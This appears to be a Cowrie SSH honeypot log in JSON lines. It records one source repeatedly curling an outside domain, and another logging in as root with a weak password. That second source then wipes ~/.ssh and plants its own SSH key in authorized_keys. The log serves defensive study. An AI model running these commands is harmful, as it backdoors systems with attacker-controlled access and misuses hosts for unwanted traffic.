{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.758760Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678aA","message":"login attempt [root/12345678aA] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.782850Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.785745Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.797237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.798008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.838069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.838878Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.891319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.892145Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.905576Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.935249Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.935809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.223006Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.224282Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.225701Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.228105Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.229671Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.234944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.235627Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.240622Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.282684Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.283583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.317330Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.322839Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.323860Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.327464Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.362543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.363553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.404135Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.405003Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.441972Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.442873Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.485613Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.486474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.630604Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.631579Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.637090Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.637994Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.689149Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.690001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.727446Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.728315Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.731059Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.732374Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.767446Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.768312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.807046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.807928Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"23.227.147.163","src_port":44790,"dst_ip":"1.2.3.4","dst_port":22,"session":"54aed05002ae","protocol":"ssh","message":"New connection: 23.227.147.163:44790 (1.2.3.4:22) [session: 54aed05002ae]","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.817020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.817747Z","src_ip":"23.227.147.163","session":"54aed05002ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.845063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.845909Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.883387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.884230Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.913495Z","src_ip":"23.227.147.163","session":"54aed05002ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.950123Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.951410Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:57.990344Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:57.991357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.031250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.032403Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.072241Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.073177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.123024Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.124018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.136297Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.161384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.162678Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.200064Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.201087Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.233757Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.238801Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.239750Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.272335Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.280030Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.280869Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.305430Z","src_ip":"23.227.147.163","session":"54aed05002ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.319553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.320406Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.350854Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.357178Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.358032Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.395102Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.395986Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.432808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.435124Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.466204Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.472284Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.511367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.512755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.563991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.565068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.601978Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.602918Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.643330Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.644192Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.682328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.685347Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:58.722377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:58.723693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
